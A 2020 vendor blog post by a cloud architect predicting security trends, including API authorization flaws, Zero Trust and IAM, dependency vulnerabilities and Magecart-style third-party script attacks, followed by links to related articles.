Steven Puddephatt, Senior Cloud Architect @ GlobalDots
13.02.2020
image 4 Min read

As we move into a new decade IT professionals will be scratching their heads wondering “what new threat is going to cause me to have to rethink my security architecture or user policy?”. As a solutions architect working with a wide range of customers, here’s my take on what’s coming.

API security to take centre stage

Up until now very little has been done around API security once you get past the basic authentication. What do I mean by this? Well to make an API ‘get’ some data, you feed it a command, let’s say in our case it’s a mobile banking app that shows your name and address as well as account number. To get information from the API, the mobile banking app has to be authenticated with the API, usually with some currently unbreakable encryption method. Great, the connection is trusted and secure. But hackers have shown time and again that once you have access to an API you can usually force it to give you data that wasn’t intended for you.

In my example imagine if swapping out the account number in my API call gave me addresses and account numbers of other bank customers. Sound far fetched? Not really, a vast majority of hacks in the news are done via the API, even Facebook and Google have been victims. You have to ask yourself ‘if Google and Facebook have problems, what are the odds that I do not?’.

And so we’ll see the adoption of machine learning tools for API’s, which, rather than relying on authentication for security, rely on behaviour algorithms instead. Practically everything has an API for it these days, and they were built with ease and portability in mind, security was something of an afterthought, an attitude which will dramatically change in the coming year.

Zero Trust and Identity and Access Management (IAM)

Zero trust is the latest buzzword to have hit nearly all meetings I sit in. Unfortunately for IT managers and sys admins it isn’t just a buzzword, it’s a new paradigm in managing access to resources which means you’ll have to rethink your approach to remote access and logins. There are different approaches to Zero Trust, but for the uninitiated it means the death of old VPN remote access systems and a move to highly secure portals that can only be accessed via a web browser.

Tightly coupled with Zero Trust is IAM, which pushes organisations to have ‘one source of truth’ for what access a user should have. IAM is necessary as we’ve shifted almost entirely to SaaS platforms, most of which are accessed with an email address and password.

How many people reading this article access Salesforce with a user/password type authentication? And how many people have left a company only to find out their old user/password still works? The problem is prolific and companies are way behind on their uptake of Zero Trust and IAM. Rest assured you’ll see more stories of VPN connections being hacked and businesses will be forced to move to new technologies.

Software hygiene and third party scripts

So we’ve all heard the scenario, you need to write a program for something-or-other. After a quick search around it turns out that three pieces of open source software available, which when used together will perform the function you require. Great, so you’ve just saved tonnes of development effort and your time to market is greatly reduced.

The only problem with this is that now you’ve got three pieces of open source code running, each of which can punch a hole in your security posture. Let’s say for example you used an open SSL library as part of this program, and then later a vulnerability is found in this SSL library. Well, how would you know you were affected by this if the library was just compiled into your program? How clean is your program and its composite parts?

This is software hygiene is now becoming a major headache for companies, especially when you’re looking at hundreds of libraries with possibly thousands of known vulnerabilities. Help is at hand and some tech startups are already offering automated tools to alert you to any CVE’s your software might contain.

On the other side of your application you’ve got third party plugins, things which you intentionally allow to access certain parts of your app to provide a feature on your website. This is currently the wild west of the IT world, with companies allowing third party javascript on their site with a very laissez-faire attitude as to what they’re really doing. Attacks leveraging this part of the attack surface roughly come under the name ‘Magecart’, the highest profile incident last year being credit card data theft from British Airways. It’s been coming for a while, but expect to see a big lock down on allowing random open source code and third party add-ons to sites.

Again, there are certain startups that are addressing the issue but I’m fairly sure we’ll see some high profile ‘Magecart’ attacks in 2020 before everyone really takes note. These types of attacks became newsworthy in the last few years and we can be sure that moving forward, they will get much worse – perhaps even bigger attacks and huge fines levied. These weaknesses in the software deployment lifecycle will need careful attention.

*This post originally appeared in SC Magazine UK on February 6, 2020

 

Read More

GlobalDots Partners With Transmit to Make Passwords Extinct
Identity & Access Management (IAM)
Admin Globaldots 08.09.22

As we rely more and more on online services, managing passwords becomes increasingly challenging. Compromised passwords lead to account takeovers, which pose existential threats to customer-facing businesses. Account takeovers led to an estimated $11.4 billion in losses in 2021, caused mostly by compromised passwords. GlobalDots, a cloud innovation leader, partners with Transmit Security, a leading […]

Read more
How To Implement Passwordless Authentication: A Step by Step Guide
Identity & Access Management (IAM)
Miguel Fersen, Senior Cloud Consultant @ GlobalDots 27.07.22

Login details are criminals’ favorite type of data, as they allow complete impersonation of a legitimate user on your system. By successfully compromising an account, an attacker becomes a wolf in sheep’s clothing, appearing completely innocuous until they launch their attack.  One of the most common consequences of cracked credentials is a data breach, the […]

Read more
slider item
Identity & Access Management (IAM)
Dror Arie, Senior Solutions Architect @ GlobalDots 06.06.22

While ransomware, securing the cloud, and sprawling IoT vulnerabilities are keeping our CISO’s up at night, credential phishing is a consistent threat, plaguing their employees. Credential Phishing is the practice of stealing user ID/email address and password combinations, by masquerading as a reputable or known entity or person in email, instant message, or another communication […]

Read more
Unlock Your Cloud Potential
Schedule a call with our experts. Discover new technology and get recommendations to improve your performance.
Book a Demo